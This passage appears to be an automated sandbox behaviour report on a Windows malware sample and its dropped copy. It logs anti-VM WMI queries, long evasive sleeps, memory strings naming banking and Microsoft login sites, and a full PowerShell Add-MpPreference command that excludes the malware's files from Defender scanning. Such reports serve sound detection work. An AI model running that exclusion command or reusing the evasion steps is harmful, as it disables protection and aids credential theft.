                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 2FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 3110000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 2FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 7E00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 8E00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 8FB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 9FB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 17D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 3290000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: 1870000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 2DE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 3040000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 2E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 78F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 73F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 88F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 98F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 12C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 2D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Memory allocated: 12C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 353
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5852
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5630
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Window / User API: threadDelayed 3338
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Window / User API: threadDelayed 2634
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Window / User API: threadDelayed 1329
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe Window / User API: threadDelayed 8139
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 2656 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep count: 353 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716 Thread sleep count: 5852 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1308 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 1776 Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 892 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe TID: 1276 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 2824 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 3852 Thread sleep time: -25825441703193356s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 5520 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe TID: 2468 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: discord.comVMware20,11696428655f
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WltfeVzR.exe, 00000010.00000002.2314654586.000000000107F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrps
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: global block list test formVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2206038286.00000000015FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: tmpA4D3.tmp.16.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WltfeVzR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeMemory written: C:\Users\user\Desktop\tfF3UBTdr8.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WltfeVzR.exeMemory written: C:\Users\user\AppData\Roaming\WltfeVzR.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\tfF3UBTdr8.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\tfF3UBTdr8.exe"Jump to behavior
